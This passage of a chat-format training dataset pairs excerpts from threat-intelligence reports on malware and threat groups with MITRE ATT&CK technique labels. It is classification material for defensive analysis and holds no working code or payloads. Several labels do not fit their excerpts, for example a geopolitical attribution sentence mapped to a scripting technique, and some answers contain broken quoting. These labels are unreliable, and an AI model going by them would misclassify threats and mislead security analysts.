- "content": "This account was suspended in short order, but immediately after the suspension, an alternate account with the username @dookhtegan1 with the same stylized profile image appeared and is still currently active"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery', 'T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "performs desktop video recording and captures screenshots of the desktop and sends it to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pteranodon can capture screenshots at a configurable interval."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak can download a module to search for and build a report of harvested credential data."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has deployed Meterpreter stagers and SplinterRAT instances in the victim network after moving laterally."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32's backdoor has exfiltrated data using the already opened channel with its C&C server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A string, that contains a PDB-path to debug symbols, suggests one such tool was named CredRaptor by the attackers. This tool collects saved passwords from various browsers such as Google Chrome, Internet Explorer, Mozilla Firefox, and Opera"
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to retrieve information about shares on remote hosts."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Web inject – the configuration file for the hooking module Once communication with the C2 is established, one of the additional modules that is downloaded is the web-inject module. It intercepts the victim’s traffic by injecting the module into the browser’s process and hooking the network API. The hooking module gets the execution flow from intercepted APIs, and as soon as the victim accesses certain web pages related to banking and finance, additional JavaScript is injected into the source page"
- },
- {
- "role": "assistant",
- "content": "T1185 - Browser Session Hijacking', 'T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SVR target organisations who supply privileged software to intelligence targets."
- },
- {
- "role": "assistant",
- "content": "T1195.002 - Compromise Software Supply Chain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The script gathers system specific data, such as the domain the system belongs to and the current username, that it constructs in the following format: \\:pass The above string is encoded using a custom base64 encoder to strip out non-alphanumeric characters (=, / and +) from the data and replaces them with domain safe values (01, 02 and 03 respectively)"
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EnvyScout has been distributed via spearphishing as an email attachment."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEARDROP was decoded using a custom rolling XOR algorithm to execute a customized Cobalt Strike payload."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As has been previously reported, there are two variants of the trojan TinkaOTP. The version that has received the most attention contains the malware payload in the application bundle’s Resources folder. The file is a Mach-O binary disguised as a .nib file, at ../Resources/Base.lproj/Submenu.nib. This file is copied directly to the users Library folder and renamed as .mina. The dot prefix is added in order to make it invisible in the Finder"
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LazyScripter has used JavaScript in its attacks."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turian can search for specific files and list directories."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The following information is gathered from the endpoint, stored in the file 1.hwp, and sent to the control server"
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "bypasses UAC to escalate privileges by using a custom “RedirectEXE” shim database."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The xmrig mining process joins the supportxmr mining pool using the wallet address 428uyvSqdpVZL7HHgpj2T5SpasCcoHZNTTzE3Lz2H5ZkiMzqayy19sYDcBGDCjoWbTfLBnc3tc9rG4Y8gXQ8fJiP5tqeBda. At the time of writing, the malware campaign has ~25.05 KH/s hashing power and there is 11 XMR (~$1,500) in the wallet"
- },
- {
- "role": "assistant",
- "content": "T1496 - Resource Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has registered domains for targeting intended victims."
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) Writes itself to %AppData%\\Microsoft\\Word\\log.ps1 2) Sets up persistence for this file, using a run key. 6) Removes all registry entries that are left behind during the dropper process"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI has created a shortcut called \"Anti virus service.lnk\" in an apparent attempt to masquerade as a legitimate file."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fast-paced intrusion • Very stealthy • Rapidly changing tactics • Employed advanced attack techniques 4) 4. All rights reserved.23 Our Response: Tackled Attacker WMI Usage ADVANCED ATTACK TECHNIQUES 24) 24. Captured entire functions of PS scripts, attacker commands, script output, etc. Wrote indicators based on observed attacker activity • Identified lateral movement, unique backdoors, credential theft, data theft, recon, persistence creation, etc. All rights reserved.25 Our Response: Increased PowerShell Visibility ADVANCED ATTACK TECHNIQUES 26) 26. All rights reserved.27 Our Response: Addressed Ticket Attacks ADVANCED ATTACK TECHNIQUES Event ID 4624 Event ID 4672 Event ID 4634 28) 28. All rights reserved.29 BONUS SLIDE: Even More WMI + PS FUN FACT: We saw the attacker test this backdoor before deployment 30) 30"
- },
- {
- "role": "assistant",
- "content": "T1550.003 - Use Alternate Authentication Material: Pass the Ticket"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Then extract the image file \"image1.jpeg\" contained in the document. Find the special logo in the picture data, decode the subsequent steganographic PE data, release the randomly named .exe in the %ALLUSERSPROFILE% directory and run it"
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to find files and directories with native functionality such as dir commands."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrailBlazer can masquerade its C2 traffic as legitimate Google Notifications HTTP requests."
- },
- {
- "role": "assistant",
- "content": "T1001 - Data Obfuscation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To ensure that the compromised system is unable to restore from backup, REvil deletes shadow copies and disables recovery mode by executing the following command via ShellExecute"
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNSPOT was identified on disk with a filename of taskhostsvc.exe (SHA256 Hash: c45c9bda8db1d470f1fd0dcc346dc449839eb5ce9a948c70369230af0b3ef168), and internally named taskhostw.exe by its developers. It was likely built on 2020-02-20 11:40:02, according to the build timestamp found in the binary, which is consistent with the currently assessed StellarParticle supply chain attack timeline. StellarParticle operators maintained the persistence of SUNSPOT by creating a scheduled task set to execute when the host boots"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this latest campaign, APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chrommme can retrieve the username from a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Intrusions and campaigns conducted by this group are in-line with PRC goals and self-interest in Taiwan"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SDBbot has the ability to record video on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Recent samples, with the ability to discover wireless network settings and credentials will spawn an instance of netsh.exe after a brief sleeping period (after launch). The syntax utilized initially is"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Although the activity was previously linked by others to the FIN7 threat actor group, our research suggests the activity is in fact espionage related and unlikely to be FIN7 related"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses the Confuser protector to obfuscate an embedded .Net Framework assembly used for C2. also encodes collected data in hexadecimal format before writing to files on disk and obfuscates strings."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LightNeuron encrypts its configuration files with AES-256."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For Frankenstein, the threat actors obtained and used Empire."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Octopus has been disguised as legitimate programs, such as Java and Telegram Messenger."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The data found within this file is encrypted using a single-byte xor key of 0x41. The file header structure, with the underlying data still encrypted, can be seen below"
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE can use XDG Autostart Entries to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.013 - XDG Autostart Entries"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda has downloaded additional executables following the initial infection stage."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mis-Type has downloaded additional malware and files onto a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "copied all targeted files to a directory called index that was eventually uploaded to the C&C server."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "checks for processes associated with anti-virus vendors."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Use of obfuscated shellcode executed via PowerShell to download a \"reverse_tcp\" payload from Metasploit onto victim systems"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cardinal RAT injects into a newly spawned process created from a native Windows executable."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This field contains a URL that the Trojan will use to upload the contents of the .txt file, which will be structured as . where the process ID is encoded with the same character substitution function as seen previously in Table 4"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used Meterpreter to enumerate users on remote systems."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conclusion Tick has left a trail of evidence indicating that its activity began as early as 2006. In earlier attacks, the group used malicious Microsoft Word documents to infect victims, with compromised websites being added to the mix as a more recent attack vector"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Helminth implant is routinely delivered through macro-enabled Microsoft Office documents requiring user interaction to execute an obfuscated Visual Basic Script"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware next sets out to prevent the victim from stopping the ongoing infection. First, the machine is removed from the Active Directory domain by using WinAPI or WMI. This makes it harder to remotely push any remediation tools to the infected machines"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conficker has used a DGA that seeds with the current UTC victim system date to generate domains."
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ryuk has called \"GetLogicalDrives\" to emumerate all mounted drives, and \"GetDriveTypeW\" to determine the drive type."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DCSrv has created Registry keys for persistence."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Analysis of the F.bmp image revealed that it is indeed using Least Significant Bit (LSB) Steganography [9,10], a commonly used form of steganography that embeds data in an image without significantly affecting its appearance"
- },
- {
- "role": "assistant",
- "content": "T1001.002 - Data Obfuscation via Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Since 2014, Inception has widened its use of cloud service providers for C&C purposes. Whereas previously it relied on one service provider (CloudMe.com), more recently it has employed a least five cloud service providers"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has remotely copied tools and malware onto targeted systems."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This function will either bind the calling process to a port or has the calling process connect to a remote host. The function is called in the following manner"
- },
- {
- "role": "assistant",
- "content": "T1134.002 - Create Process with Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Milan can query `HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography MachineGuid` to retrieve the machine GUID."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SodaMaster can enumerate the host name and OS version on a target system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT has the ability to gather information about the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet has been seen exfiltrating system information stored within cookies sent within an HTTP GET request back to its C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nebulae can list files and directories on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The value is derived using the IOService to access the IOPlatformUUID property, which is equivalent to the “Hardware UUID” listed in the system information application, as seen in the Figure 3 screenshot of our analysis system"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emissary has the capability to execute the command \"net localgroup administrators\"."
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLAINTEE gains persistence by adding the Registry key \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "configures itself as a service."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot can identify the user and groups the user belongs to on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Higaisa used a function to gather the current time."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobian RAT obfuscates communications with the C2 server using Base64 encoding."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Drovorub can exfiltrate files over C2 infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoomBox can upload data to dedicated per-victim folders in Dropbox."
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A version of KONNI searches for filenames created with a previous version of the malware, suggesting different versions targeted the same victims and the versions may work together."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
